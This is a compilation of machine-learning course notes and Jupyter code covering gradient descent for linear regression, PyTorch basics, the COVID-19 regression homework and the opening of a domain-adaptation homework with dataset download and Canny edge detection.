                    In the contour plot, click on a point to select w and b to achieve the lowest cost. Use the contours to guide your selections. Note, it can take a few seconds to update the graph.


plt.close('all')
fig, ax, dyn_items = plt_stationary(x_train, y_train)
updater = plt_update_onclick(fig, ax, x_train, y_train, dyn_items)


                    Above, note the dashed lines in the left plot. These represent the portion of the cost contributed by each example in your training set. In this case, values of approximately $w=209$ and $b=2.4$ provide low cost. Note that, because our training examples are not on a line, the minimum cost is not zero.


                    Convex Cost surface

                    The fact that the cost function squares the loss ensures that the ‘error surface’ is convex like a soup bowl. It will always have a minimum that can be reached by following the gradient in all dimensions. In the previous plot, because the $w$ and $b$ dimensions scale differently, this is not easy to recognize. The following plot, where $w$ and $b$ are symmetric, was shown in lecture:


soup_bowl()


                    Congratulations!

                    You have learned the following:


                    Tools

                  • Matplotlib, a popular library for plotting data
                  • plotting routines in the lab_utils.py file in the local directory
import math, copy
import numpy as np
import matplotlib.pyplot as plt
plt.style.use('./deeplearning.mplstyle')
from lab_utils_uni import plt_house_x, plt_contour_wgrad, plt_divergence, plt_gradients

!ls -al
'ls' is not recognized as an internal or external command, operable program or batch file.
                   

                  Problem Statement

# Load our data set
x_train = np.array([1.0, 2.0])   #features
y_train = np.array([300.0, 500.0])   #target value

                  Compute_Cost

                  This was developed in the last lab. We’ll need it again here.


#Function to calculate the cost
def compute_cost(x, y, w, b):

    m = x.shape[0]
    cost = 0

    for i in range(m):
        f_wb = w * x[i] + b
        cost = cost + (f_wb - y[i])**2
    total_cost = 1 / (2 * m) * cost

    return total_cost

                  Gradient descent summary

                  So far in this course, you have developed a linear model that predicts $f_{w,b}(x^{(i)})$:
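The referenced equations, reconstructed here so the numbering (1)–(5) used below has something to point at (this matches what compute_cost and compute_gradient implement):

$$f_{w,b}(x^{(i)}) = w x^{(i)} + b \tag{1}$$

$$J(w,b) = \frac{1}{2m} \sum_{i=0}^{m-1} \left( f_{w,b}(x^{(i)}) - y^{(i)} \right)^2 \tag{2}$$

Gradient descent repeats the following updates until convergence:

$$w = w - \alpha \frac{\partial J(w,b)}{\partial w}, \qquad b = b - \alpha \frac{\partial J(w,b)}{\partial b} \tag{3}$$

$$\frac{\partial J(w,b)}{\partial w} = \frac{1}{m} \sum_{i=0}^{m-1} \left( f_{w,b}(x^{(i)}) - y^{(i)} \right) x^{(i)} \tag{4}$$

$$\frac{\partial J(w,b)}{\partial b} = \frac{1}{m} \sum_{i=0}^{m-1} \left( f_{w,b}(x^{(i)}) - y^{(i)} \right) \tag{5}$$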


                  compute_gradient
                  compute_gradient implements (4) and (5) above and returns $\frac{\partial J(w,b)}{\partial w}$,$\frac{\partial J(w,b)}{\partial b}$. The embedded comments describe the operations.


def compute_gradient(x, y, w, b):
    """
    Computes the gradient for linear regression
    Args:
      x (ndarray (m,)): Data, m examples
      y (ndarray (m,)): target values
      w,b (scalar)    : model parameters
    Returns
      dj_dw (scalar): The gradient of the cost w.r.t. the parameters w
      dj_db (scalar): The gradient of the cost w.r.t. the parameter b
    """

    # Number of training examples
    m = x.shape[0]
    dj_dw = 0
    dj_db = 0

    for i in range(m):
        f_wb = w * x[i] + b
        dj_dw_i = (f_wb - y[i]) * x[i]
        dj_db_i = f_wb - y[i]
        dj_db += dj_db_i
        dj_dw += dj_dw_i
    dj_dw = dj_dw / m
    dj_db = dj_db / m

    return dj_dw, dj_db


                  The lectures described how gradient descent utilizes the partial derivative of the cost with respect to a parameter at a point to update that parameter.
                  Let’s use our compute_gradient function to find and plot some partial derivatives of our cost function relative to one of the parameters, $w_0$.


plt_gradients(x_train,y_train, compute_cost, compute_gradient)
plt.show()


                  Above, the left plot shows $\frac{\partial J(w,b)}{\partial w}$ or the slope of the cost curve relative to $w$ at three points. On the right side of the plot, the derivative is positive, while on the left it is negative. Due to the ‘bowl shape’, the derivatives will always lead gradient descent toward the bottom where the gradient is zero.



Gradient Descent

                  Now that gradients can be computed, gradient descent, described in equation (3) above can be implemented below in gradient_descent. The details of the implementation are described in the comments. Below, you will utilize this function to find optimal values of $w$ and $b$ on the training data.


def gradient_descent(x, y, w_in, b_in, alpha, num_iters, cost_function, gradient_function):
    """
    Performs gradient descent to fit w,b. Updates w,b by taking
    num_iters gradient steps with learning rate alpha

    Args:
      x (ndarray (m,))  : Data, m examples
      y (ndarray (m,))  : target values
      w_in,b_in (scalar): initial values of model parameters
      alpha (float)     : Learning rate
      num_iters (int)   : number of iterations to run gradient descent
      cost_function     : function to call to produce cost
      gradient_function : function to call to produce gradient

    Returns:
      w (scalar): Updated value of parameter after running gradient descent
      b (scalar): Updated value of parameter after running gradient descent
      J_history (List): History of cost values
      p_history (list): History of parameters [w,b]
    """

    w = copy.deepcopy(w_in)  # avoid modifying global w_in
    # An array to store cost J and w's at each iteration primarily for graphing later
    J_history = []
    p_history = []
    b = b_in
    w = w_in

    for i in range(num_iters):
        # Calculate the gradient and update the parameters using gradient_function
        dj_dw, dj_db = gradient_function(x, y, w, b)

        # Update Parameters using equation (3) above
        b = b - alpha * dj_db
        w = w - alpha * dj_dw

        # Save cost J at each iteration
        if i < 100000:  # prevent resource exhaustion
            J_history.append(cost_function(x, y, w, b))
            p_history.append([w, b])
        # Print cost at intervals 10 times or as many iterations if < 10
        if i % math.ceil(num_iters/10) == 0:
            print(f"Iteration {i:4}: Cost {J_history[-1]:0.2e} ",
                  f"dj_dw: {dj_dw: 0.3e}, dj_db: {dj_db: 0.3e}  ",
                  f"w: {w: 0.3e}, b:{b: 0.5e}")

    return w, b, J_history, p_history  # return w and J,w history for graphing

# initialize parameters
w_init = 0
b_init = 0
# some gradient descent settings
iterations = 10000
tmp_alpha = 1.0e-2
# run gradient descent
w_final, b_final, J_hist, p_hist = gradient_descent(x_train, y_train, w_init, b_init, tmp_alpha,
                                                    iterations, compute_cost, compute_gradient)
print(f"(w,b) found by gradient descent: ({w_final:8.4f},{b_final:8.4f})")
                  Iteration    0: Cost 7.93e+04  dj_dw: -6.500e+02, dj_db: -4.000e+02   w:  6.500e+00, b: 4.00000e+00
                   Iteration 1000: Cost 3.41e+00  dj_dw: -3.712e-01, dj_db:  6.007e-01   w:  1.949e+02, b: 1.08228e+02
                   Iteration 2000: Cost 7.93e-01  dj_dw: -1.789e-01, dj_db:  2.895e-01   w:  1.975e+02, b: 1.03966e+02

Cost versus iterations of gradient descent

A plot of cost versus iterations is a useful measure of progress in gradient descent. Cost should always decrease in successful runs. The change in cost is so rapid initially, it is useful to plot the initial descent on a different scale than the final descent. In the plots below, note the scale of cost on the axes and the iteration step.

# plot cost versus iteration
fig, (ax1, ax2) = plt.subplots(1, 2, constrained_layout=True, figsize=(12,4))
ax1.plot(J_hist[:100])
ax2.plot(1000 + np.arange(len(J_hist[1000:])), J_hist[1000:])
ax1.set_title("Cost vs. iteration(start)");  ax2.set_title("Cost vs. iteration (end)")
ax1.set_ylabel('Cost')           ;  ax2.set_ylabel('Cost')
ax1.set_xlabel('iteration step') ;  ax2.set_xlabel('iteration step')
plt.show()


Predictions

                  Now that you have discovered the optimal values for the parameters $w$ and $b$, you can now use the model to predict housing values based on our learned parameters. As expected, the predicted values are nearly the same as the training values for the same housing. Further, the value not in the prediction is in line with the expected value.


print(f"1000sqft house prediction {w_final*1.0 + b_final:0.1f} Thousand dollars")
print(f"1200sqft house prediction {w_final*1.2 + b_final:0.1f} Thousand dollars")
print(f"2000sqft house prediction {w_final*2.0 + b_final:0.1f} Thousand dollars")
                  1000sqft house prediction 300.0 Thousand dollars
                   1200sqft house prediction 340.0 Thousand dollars
                   2000sqft house prediction 500.0 Thousand dollars
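As a quick arithmetic check against the run above, which converged to roughly $w \approx 200$ and $b \approx 100$:

$$\hat{y}_{1200\text{ sqft}} \approx 200 \times 1.2 + 100 = 340 \text{ thousand dollars,}$$

matching the printed prediction.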


                  Plotting

                  You can show the progress of gradient descent during its execution by plotting the cost over iterations on a contour plot of the cost(w,b).


fig, ax = plt.subplots(1,1, figsize=(12, 6))
plt_contour_wgrad(x_train, y_train, p_hist, ax)


                  Above, the contour plot shows the $cost(w,b)$ over a range of $w$ and $b$. Cost levels are represented by the rings. Overlayed, using red arrows, is the path of gradient descent. Here are some things to note:



Zooming in, we can see the final steps of gradient descent. Note the distance between steps shrinks as the gradient approaches zero.

fig, ax = plt.subplots(1,1, figsize=(12, 4))
plt_contour_wgrad(x_train, y_train, p_hist, ax, w_range=[180, 220, 0.5], b_range=[80, 120, 0.5],
            contours=[1,5,10,20], resolution=0.5)

                  png

                  Increased Learning Rate


In the lecture there was a discussion of the proper value for the learning rate $\alpha$ in equation (3). The larger $\alpha$ is, the faster gradient descent converges to a solution, but if it is too large, gradient descent will diverge. Above you have an example of a solution which converges nicely. Let's try increasing the value of $\alpha$ and see what happens:

# initialize parameters
w_init = 0
b_init = 0
# set alpha to a large value
iterations = 10
tmp_alpha = 8.0e-1
# run gradient descent
w_final, b_final, J_hist, p_hist = gradient_descent(x_train, y_train, w_init, b_init, tmp_alpha,
                                                    iterations, compute_cost, compute_gradient)
                  Iteration    0: Cost 2.58e+05  dj_dw: -6.500e+02, dj_db: -4.000e+02   w:  5.200e+02, b: 3.20000e+02
                   Iteration    1: Cost 7.82e+05  dj_dw:  1.130e+03, dj_db:  7.000e+02   w: -3.840e+02, b:-2.40000e+02
                   Iteration    2: Cost 2.37e+06  dj_dw: -1.970e+03, dj_db: -1.216e+03   w:  1.192e+03, b: 7.32800e+02

Above, $w$ and $b$ are bouncing back and forth between positive and negative, with the absolute value increasing with each iteration. Further, on each iteration $\frac{\partial J(w,b)}{\partial w}$ changes sign and the cost is increasing rather than decreasing. This is a clear sign that the learning rate is too large and the solution is diverging.
Let's visualize this with a plot.


plt_divergence(p_hist, J_hist, x_train, y_train)
plt.show()
                  ---------------------------------------------------------------------------
                   
                   OverflowError                             Traceback (most recent call last)
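To make the mechanics of divergence concrete, here is a minimal sketch of my own (not part of the lab) on the one-dimensional cost $J(w)=w^2$. The update $w \leftarrow w - \alpha \cdot 2w = (1-2\alpha)\,w$ shrinks the parameter when $|1-2\alpha|<1$ and blows it up otherwise:

# Minimal 1-D illustration: gradient descent on J(w) = w**2
for alpha in (0.1, 1.2):          # reasonable vs. too-large learning rate
    w = 1.0
    for _ in range(5):
        grad = 2 * w              # dJ/dw for J(w) = w**2
        w -= alpha * grad
    print(f"alpha={alpha}: w after 5 steps = {w:.3f}")

With alpha=0.1 each step multiplies w by 0.8 and the iterate decays toward the minimum; with alpha=1.2 each step multiplies w by -1.4, so the iterate alternates sign and grows, exactly the behavior in the iteration table above.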
ML 李宏毅 Lecture 1 - Introduction of Deep Learning

Install PyTorch

Download cu117/torch-1.13.1%2Bcu117-cp39-cp39-win_amd64.whl and cu117/torchvision-0.14.1%2Bcu117-cp39-cp39-win_amd64.whl.

In the download directory, open cmd and install them with pip install torch-1.13.1+cu117-cp39-cp39-win_amd64.whl and pip install torchvision-0.14.1+cu117-cp39-cp39-win_amd64.whl.

Verify in Python:

import torch

print(torch.__version__)
print(torch.cuda.is_available())  # whether the CUDA GPU can be used

1.13.1+cu117
True

                  Training Neural Networks

Steps for training a neural network:

1. Prepare the data with Dataset and DataLoader
2. Define the network with torch.nn.Module
3. Define the loss function (torch.nn.MSELoss, torch.nn.CrossEntropyLoss, etc.)
4. Define the optimizer (torch.optim)
5. Run the entire training, validation, and testing procedure

                    Dataset & Dataloader

Dataset: stores the data samples $x$ and the expected values $y$

DataLoader: groups the data into batches and enables multiprocess loading

dataset = MyDataset(file)
dataloader = DataLoader(dataset, batch_size, shuffle=True)

                    机器学习,深度学习模型训练阶段的 Shuffle 重要么?为什么?_技术宅 zch 的博客-CSDN 博客_深度学习 shuffle

• For training and validation, shuffle the data: shuffle=True
• For testing, do not shuffle: shuffle=False
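As a small side sketch (my own, not from the lecture): shuffle=True draws a new batch order each epoch; if you need the shuffling itself to be reproducible, pass a seeded torch.Generator:

import torch
from torch.utils.data import DataLoader

g = torch.Generator().manual_seed(0)
loader = DataLoader(list(range(10)), batch_size=5, shuffle=True, generator=g)
for batch in loader:
    print(batch.tolist())   # a random permutation split into two batches of 5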

For example, the following code splits the dataset into batches of 5:

dataset = MyDataset(file)
dataloader = DataLoader(dataset, batch_size=5, shuffle=False)

                    png

Design a MyDataset class to manage the dataset:

from torch.utils.data import Dataset, DataLoader


class MyDataset(Dataset):
    def __init__(self, file):
        """Read the data and initialize."""
        self.data = ...

    def __getitem__(self, index):
        """Return one sample."""
        return self.data[index]

    def __len__(self):
        """Return the size of the dataset."""
        return len(self.data)
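A hypothetical usage sketch of the class above (the file name and the contents of self.data are placeholders):

dataset = MyDataset('data.csv')                               # placeholder path
dataloader = DataLoader(dataset, batch_size=5, shuffle=True)
for batch in dataloader:
    pass   # each batch holds 5 samples (the last batch may be smaller)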
                    Tensors

Tensors in PyTorch are high-dimensional arrays, the counterpart of NumPy's array.

                    dim in PyTorch == axis in NumPy
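A quick sketch of the correspondence (my own example):

import numpy as np
import torch

a = np.ones((2, 3))
t = torch.ones(2, 3)
print(a.sum(axis=1))   # NumPy uses axis= -> [3. 3.]
print(t.sum(dim=1))    # PyTorch uses dim= -> tensor([3., 3.])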

Creating tensors
• Pass in the data directly, as a list or numpy.ndarray
x = torch.tensor([[1, -1], [-1, 1]])

x = torch.from_numpy(np.array([[1, -1], [-1, 1]]))
• Specify the shape and fill with 0s or 1s
x = torch.zeros([2, 2])

x = torch.ones([1, 2, 5])
Common operations
• Addition

z = x + y

• Subtraction

z = x - y

• Power

y = x.pow(2)

• Summation

y = x.sum()

• Mean

y = x.mean()

• Transpose

x = x.transpose(0, 1)
• Squeeze: remove a dimension of size 1
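A small sketch of squeeze (my own example):

x = torch.zeros([1, 2, 3])
y = x.squeeze(0)       # drops the size-1 dimension: [1, 2, 3] -> [2, 3]
print(y.shape)         # torch.Size([2, 3])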
                    Device

Choose whether tensor computations run on the CPU or on CUDA.

                    CPU

x = x.to('cpu')

                    GPU

x = x.to('cuda')
Computing Gradients

Define $x$, declaring in advance that its gradient is required: requires_grad=True

$$x=\begin{bmatrix}1 & 0 \\ -1 & 1\end{bmatrix}$$

x = torch.tensor([[1., 0.], [-1., 1.]], requires_grad=True)

                    $$z=\sum_i\sum_j x^2_{i,j}$$

z = x.pow(2).sum()

Compute the derivative

                    $$\frac{\partial z}{\partial x_{i,j}}=2x_{i,j}$$

z.backward()

Obtain the gradient of $x$

$$\frac{\partial z}{\partial x}=\begin{bmatrix}2 & 0 \\ -2 & 2\end{bmatrix}$$

x.grad

tensor([[ 2.,  0.], [-2.,  2.]])
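One detail worth knowing (my own note, not from the slide): gradients accumulate across backward() calls, which is why the training loop below calls optimizer.zero_grad() every step.

x = torch.tensor([[1., 0.], [-1., 1.]], requires_grad=True)
for _ in range(2):
    z = x.pow(2).sum()
    z.backward()
print(x.grad)   # twice the single-pass gradient: tensor([[ 4., 0.], [-4., 4.]])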

Step 2. torch.nn.Module

• Fully connected layer
layer = torch.nn.Linear(32, 64)
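A shape-check sketch (my own example): nn.Linear(32, 64) maps the last dimension from 32 features to 64.

layer = torch.nn.Linear(32, 64)
x = torch.zeros(8, 32)       # a batch of 8 samples with 32 features each
print(layer(x).shape)        # torch.Size([8, 64])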
• Activation functions
nn.Sigmoid()
nn.ReLU()

Put the network definition inside a MyModel class:

import torch.nn as nn

class MyModel(nn.Module):
    def __init__(self):
        """Initialize the model and define the layers."""
        super(MyModel, self).__init__()
        self.net = nn.Sequential(
            nn.Linear(10, 32),
            nn.Sigmoid(),
            nn.Linear(32, 1)
        )

    def forward(self, x):
        """Compute the output of the network."""
        return self.net(x)

You can also write it without nn.Sequential; the code below is equivalent:

import torch.nn as nn

class MyModel(nn.Module):
    def __init__(self):
        super(MyModel, self).__init__()
        self.layer1 = nn.Linear(10, 32)
        self.layer2 = nn.Sigmoid()    # no trailing comma here: it would turn the layer into a tuple
        self.layer3 = nn.Linear(32, 1)

    def forward(self, x):
        out = self.layer1(x)
        out = self.layer2(out)
        out = self.layer3(out)
        return out

Step 3. torch.nn.MSELoss, torch.nn.CrossEntropyLoss, etc.

Define the loss function

• MSE

criterion = nn.MSELoss()

• Cross-entropy loss

criterion = nn.CrossEntropyLoss()

• Compute the loss from the prediction and the expected value

loss = criterion(model_output, expected_value)

Step 4. torch.optim

Choose an optimization algorithm that reduces the loss, e.g. Stochastic Gradient Descent (SGD)

torch.optim.SGD(model.parameters(), lr, momentum=0)

Step 5. Entire Procedure

                    Neural Network Training Setup

The full pipeline: read the data, split it, define the model, the loss function, and the optimizer:

dataset = MyDataset(file)
tr_set = DataLoader(dataset, 16, shuffle=True)
model = MyModel().to(device)
criterion = nn.MSELoss()
optimizer = torch.optim.SGD(model.parameters(), 0.1)
                    Neural Network Training Loop

The training loop:

for epoch in range(n_epochs):                  # one epoch at a time
    model.train()                              # set the model to train mode
    for x, y in tr_set:                        # read x, y from the dataloader
        optimizer.zero_grad()                  # reset the gradients to zero
        x, y = x.to(device), y.to(device)      # move the data to the device (CPU/CUDA)
        pred = model(x)                        # forward pass (compute the outputs)
        loss = criterion(pred, y)              # compute the loss
        loss.backward()                        # compute the gradients (backpropagation)
        optimizer.step()                       # update the parameters
                    Neural Network Validation Loop

Continuing inside the epoch loop above:

model.eval()                                   # set the model to evaluation mode
total_loss = 0                                 # initialize the loss accumulator
for x, y in dv_set:                            # read x, y from the dataloader
    x, y = x.to(device), y.to(device)          # move the data to the device (CPU/CUDA)
    with torch.no_grad():                      # disable gradient computation
        pred = model(x)                        # compute the predictions
        loss = criterion(pred, y)              # compute the loss
    total_loss += loss.cpu().item() * len(x)   # accumulate the loss
avg_loss = total_loss / len(dv_set.dataset)    # compute the average loss
                    Neural Network Testing Loop
model.eval()                                   # set the model to evaluation mode
preds = []                                     # list to collect the predictions
for x in tt_set:                               # read x from the dataloader
    x = x.to(device)                           # move the data to the device (CPU/CUDA)
    with torch.no_grad():                      # disable gradient computation
        pred = model(x)                        # compute the predictions
        preds.append(pred.cpu())               # collect the predictions on the CPU
                    Notice - model.eval(), torch.no_grad()
• model.eval() changes the behavior of some layers, such as dropout and batch normalization.
• torch.no_grad() disables gradient tracking inside the block, which saves memory and computation during inference.
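A small sketch of both behaviors (my own example):

import torch
import torch.nn as nn

drop = nn.Dropout(p=0.5)
x = torch.ones(4, requires_grad=True)

drop.train()
print(drop(x))    # train mode: some entries zeroed, the rest scaled by 1/(1-p)
drop.eval()
print(drop(x))    # eval mode: identity, tensor([1., 1., 1., 1.], ...)

with torch.no_grad():
    y = x * 2
print(y.requires_grad)   # False: no autograd graph was recorded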
Save/Load Trained Models
• Save

torch.save(model.state_dict(), path)
                      • Load
                      -
                      ckpt = torch.load(path)  # 保存文件路径
                      model.load_state_dict(ckpt) # 保存 ckpt 文件
                      +
                      1
                      2
                      ckpt = torch.load(path)  # 保存文件路径
                      model.load_state_dict(ckpt) # 保存 ckpt 文件

                      More About PyTorch

• torchaudio

                        HW1

                        Download data

Get the datasets covid.train.csv and covid.test.csv from https://www.kaggle.com/competitions/ml2022spring-hw1.
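A hypothetical alternative, assuming the Kaggle CLI is installed and authenticated:

!kaggle competitions download -c ml2022spring-hw1
!unzip ml2022spring-hw1.zip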

                        Import packages

# Numerical operations
import math
import numpy as np
# Reading/writing data
import pandas as pd
import os
import csv
# Progress bar
from tqdm import tqdm
# PyTorch
import torch
import torch.nn as nn
from torch.utils.data import Dataset, DataLoader, random_split
# Plotting learning curves
from torch.utils.tensorboard import SummaryWriter

                        Some Utility Functions

                        You do not need to modify this part.

def same_seed(seed):
    """Fix the random number generator seeds for reproducibility."""
    torch.backends.cudnn.deterministic = True
    torch.backends.cudnn.benchmark = False
    np.random.seed(seed)
    torch.manual_seed(seed)
    if torch.cuda.is_available():
        torch.cuda.manual_seed_all(seed)


def train_valid_split(data_set, valid_ratio, seed):
    """Split the provided training data into training and validation sets, returned as numpy arrays."""
    valid_set_size = int(valid_ratio * len(data_set))
    train_set_size = len(data_set) - valid_set_size
    train_set, valid_set = random_split(data_set,
                                        [train_set_size, valid_set_size],
                                        generator=torch.Generator().manual_seed(seed))
    return np.array(train_set), np.array(valid_set)


def predict(test_loader, model, device):
    model.eval()  # Set your model to evaluation mode.
    preds = []
    for x in tqdm(test_loader):
        x = x.to(device)
        with torch.no_grad():
            pred = model(x)
            preds.append(pred.detach().cpu())
    preds = torch.cat(preds, dim=0).numpy()
    return preds

                        Dataset

class COVID19Dataset(Dataset):
    """
    x: features
    y: targets; if None, make predictions
    """
    def __init__(self, x, y=None):
        if y is None:
            self.y = y
        else:
            self.y = torch.FloatTensor(y)  # convert from np.array to torch tensor
        self.x = torch.FloatTensor(x)

    def __getitem__(self, idx):
        """Return one sample by index."""
        if self.y is None:
            return self.x[idx]
        else:
            return self.x[idx], self.y[idx]

    def __len__(self):
        return len(self.x)
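A quick hypothetical smoke test of the class above with random data (117 matches the feature count reported later):

import numpy as np
x = np.random.rand(8, 117).astype(np.float32)
y = np.random.rand(8).astype(np.float32)
ds = COVID19Dataset(x, y)
print(len(ds), ds[0][0].shape)   # 8 torch.Size([117])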

                        Neural Network Model

Try out different model architectures by modifying the class below.

class My_Model(nn.Module):
    def __init__(self, input_dim):
        super(My_Model, self).__init__()  # call nn.Module's __init__
        # TODO: modify the model's structure; be careful with dimensions.
        # Define the layers of the network.
        self.layers = nn.Sequential(
            nn.Linear(input_dim, 16),
            nn.ReLU(),           # activation: ReLU
            nn.Linear(16, 8),    # 16 input features, 8 output features
            nn.ReLU(),
            nn.Linear(8, 1)      # 8 input features, 1 output (regression)
        )

    def forward(self, x):
        x = self.layers(x)
        x = x.squeeze(1)  # squeeze the output: (B, 1) -> (B)
        return x

                        Feature Selection

Select the features you consider useful by modifying the function below.

def select_feat(train_data, valid_data, test_data, select_all=True):
    """Select useful features for the regression task."""
    y_train, y_valid = train_data[:, -1], valid_data[:, -1]
    raw_x_train, raw_x_valid, raw_x_test = train_data[:, :-1], valid_data[:, :-1], test_data

    if select_all:
        feat_idx = list(range(raw_x_train.shape[1]))
    else:
        feat_idx = [0, 1, 2, 3, 4]  # TODO: select suitable feature columns

    return raw_x_train[:, feat_idx], raw_x_valid[:, feat_idx], raw_x_test[:, feat_idx], \
           y_train, y_valid
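One hypothetical way to fill in feat_idx (not part of the original notebook) is to rank features by absolute Pearson correlation with the target and keep the top k; top_k_feat_idx below is an illustrative helper:

import numpy as np

def top_k_feat_idx(train_data, k=16):
    # Rank features by |Pearson correlation| with the target (last column).
    x, y = train_data[:, :-1], train_data[:, -1]
    corr = np.array([abs(np.corrcoef(x[:, i], y)[0, 1]) for i in range(x.shape[1])])
    return list(np.argsort(corr)[::-1][:k])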

                        Training Loop

def trainer(train_loader, valid_loader, model, config, device):
    # Define the loss function.
    criterion = nn.MSELoss(reduction='mean')
    # Define the optimizer.
    # TODO: check https://pytorch.org/docs/stable/optim.html for more available algorithms.
    # TODO: L2 regularization (weight decay), or implement your own.
    optimizer = torch.optim.SGD(model.parameters(), lr=config['learning_rate'], momentum=0.9)

    writer = SummaryWriter()  # tensorboard visualization

    if not os.path.isdir('./models'):
        os.mkdir('./models')  # create a directory to save the models

    n_epochs, best_loss, step, early_stop_count = config['n_epochs'], math.inf, 0, 0

    for epoch in range(n_epochs):
        model.train()  # set your model to training mode
        loss_record = []

        # tqdm visualizes the training progress.
        train_pbar = tqdm(train_loader, position=0, leave=True)

        for x, y in train_pbar:
            optimizer.zero_grad()              # reset the gradients to zero
            x, y = x.to(device), y.to(device)  # move the data to the device
            pred = model(x)
            loss = criterion(pred, y)
            loss.backward()                    # compute the gradients (backpropagation)
            optimizer.step()                   # update the parameters
            step += 1
            loss_record.append(loss.detach().item())

            # Show the current epoch number and loss on the progress bar.
            train_pbar.set_description(f'Epoch [{epoch+1} / {n_epochs}]')
            train_pbar.set_postfix({'loss': loss.detach().item()})

        mean_train_loss = sum(loss_record) / len(loss_record)
        writer.add_scalar('Loss/train', mean_train_loss, step)

        model.eval()  # set your model to evaluation mode
        loss_record = []
        for x, y in valid_loader:
            x, y = x.to(device), y.to(device)
            with torch.no_grad():
                pred = model(x)
                loss = criterion(pred, y)
            loss_record.append(loss.item())

        mean_valid_loss = sum(loss_record) / len(loss_record)
        print(f'Epoch [{epoch + 1} / {n_epochs}]: Train loss: {mean_train_loss:.4f}, '
              f'Valid loss: {mean_valid_loss:.4f}')
        writer.add_scalar('Loss/valid', mean_valid_loss, step)

        if mean_valid_loss < best_loss:
            best_loss = mean_valid_loss
            torch.save(model.state_dict(), config['save_path'])  # save your best model
            print('Saving model with loss {:.3f}...'.format(best_loss))
            early_stop_count = 0
        else:
            early_stop_count += 1

        if early_stop_count >= config['early_stop']:
            # The model is not improving, so we halt training.
            print('\nModel is not improving, so we halt the training session.')
            return

                        Configurations

config contains the hyperparameters and the model save path.

device = 'cuda' if torch.cuda.is_available() else 'cpu'
config = {
    'seed': 5201314,        # random seed
    'select_all': True,     # whether to use all features
    'valid_ratio': 0.2,     # validation set size = training set size * valid_ratio
    'n_epochs': 3000,       # number of epochs
    'batch_size': 256,      # batch size
    'learning_rate': 1e-5,  # learning rate
    'early_stop': 400,      # stop training if the model shows no improvement for this many epochs
    'save_path': './models/model.ckpt'  # model save path
}

                        Dataloader

                        Read data from files and set up training, validation, and testing sets. You do not need to modify this part.

# Set seed for reproducibility
same_seed(config['seed'])

# train_data size: 2699 x 118 (id + 37 states + 16 features x 5 days)
# test_data size: 1078 x 117 (without last day's positive rate)
train_data, test_data = pd.read_csv('./covid.train.csv').values, \
                        pd.read_csv('./covid.test.csv').values
train_data, valid_data = train_valid_split(train_data,
                                           config['valid_ratio'],
                                           config['seed'])

# Print out the data size.
print(f"""train_data size: {train_data.shape}
valid_data size: {valid_data.shape}
test_data size: {test_data.shape}""")

# Select features
x_train, x_valid, x_test, y_train, y_valid = select_feat(train_data,
                                                         valid_data,
                                                         test_data,
                                                         config['select_all'])

# Print out the number of features.
print(f'number of features: {x_train.shape[1]}')

train_dataset, valid_dataset, test_dataset = COVID19Dataset(x_train, y_train), \
                                             COVID19Dataset(x_valid, y_valid), \
                                             COVID19Dataset(x_test)

# Pytorch data loader loads pytorch dataset into batches.
train_loader = DataLoader(train_dataset, batch_size=config['batch_size'],
                          shuffle=True, pin_memory=True)
valid_loader = DataLoader(valid_dataset, batch_size=config['batch_size'],
                          shuffle=True, pin_memory=True)
test_loader = DataLoader(test_dataset, batch_size=config['batch_size'],
                         shuffle=False, pin_memory=True)
                        train_data size: (2160, 118) 
                         valid_data size: (539, 118) 
                         test_data size: (1078, 117)
                         number of features: 117
                         

                        Start training!

# Put your model and data on the same computation device.
model = My_Model(input_dim=x_train.shape[1]).to(device)
trainer(train_loader, valid_loader, model, config, device)

                        Plot learning curves with tensorboard (optional)

Visualize the training results.

                        tensorboard is a tool that allows you to visualize your training progress.

If this block does not display your learning curve, please wait for a few minutes and re-run it. It might take some time to load the logging information.

%reload_ext tensorboard
%tensorboard --logdir=./runs/

This displays tensorboard inline in the Jupyter Notebook.

                        Testing

The predictions of your model on the testing set will be stored in pred.csv.

def save_pred(preds, file):
    """Save predictions to the specified file."""
    with open(file, 'w') as fp:
        writer = csv.writer(fp)
        writer.writerow(['id', 'tested_positive'])
        for i, p in enumerate(preds):
            writer.writerow([i, p])

model = My_Model(input_dim=x_train.shape[1]).to(device)
model.load_state_dict(torch.load(config['save_path']))
preds = predict(test_loader, model, device)
save_pred(preds, 'pred.csv')
                        100%|██████████| 5/5 [00:00<00:00, 500.02it/s]
                         
ML 李宏毅 Lecture 11 - Adaptation

HW11 - Domain Adaptation

We will train a model on photos with labels, and then try to predict the labels of hand-drawn doodles.

The data can be downloaded here; the code below downloads and visualizes it.

Note: both the source and target data are balanced, and you may use this information.

                        -
                        # Download dataset
                        !wget "https://github.com/redxouls/ml2020spring-hw11-dataset/releases/download/v1.0.0/real_or_drawing.zip" -O real_or_drawing.zip

                        # Download from mirrored dataset link
                        # !wget "https://github.com/redxouls/ml2020spring-hw11-dataset/releases/download/v1.0.1/real_or_drawing.zip" -O real_or_drawing.zip
                        # !wget "https://github.com/redxouls/ml2020spring-hw11-dataset/releases/download/v1.0.2/real_or_drawing.zip" -O real_or_drawing.zip

                        # Unzip the files
                        !unzip real_or_drawing.zip
                        -
                        Streaming output truncated to the last 5000 lines.
                        inflating: real_or_drawing/train_data/0/106.bmp
                        inflating: real_or_drawing/train_data/0/107.bmp
                        inflating: real_or_drawing/train_data/0/108.bmp
                        inflating: real_or_drawing/train_data/0/109.bmp
                        inflating: real_or_drawing/train_data/0/11.bmp
                        ...
import matplotlib.pyplot as plt

def no_axis_show(img, title='', cmap=None):
    # imshow, with the interpolation mode set to "nearest".
    fig = plt.imshow(img, interpolation='nearest', cmap=cmap)
    # do not show the axes in the images.
    fig.axes.get_xaxis().set_visible(False)
    fig.axes.get_yaxis().set_visible(False)
    plt.title(title)

titles = ['horse', 'bed', 'clock', 'apple', 'cat', 'plane', 'television', 'dog', 'dolphin', 'spider']
plt.figure(figsize=(18, 18))
for i in range(10):
    plt.subplot(1, 10, i+1)
    fig = no_axis_show(plt.imread(f'real_or_drawing/train_data/{i}/{500*i}.bmp'), title=titles[i])

                        png

plt.figure(figsize=(18, 18))
for i in range(10):
    plt.subplot(1, 10, i+1)
    fig = no_axis_show(plt.imread(f'real_or_drawing/test_data/0/' + str(i).rjust(5, '0') + '.bmp'))

                        png

Special Domain Knowledge

When we doodle, we usually draw only the outline, so we can apply edge detection to the source data to make it more similar to the target data.

Canny Edge Detection

The implementation of Canny edge detection is given below. The algorithm itself is not described in detail here; if you are interested, see the wiki or here.

With cv2, Canny edge detection needs only two parameters: low_threshold and high_threshold.

cv2.Canny(image, low_threshold, high_threshold)

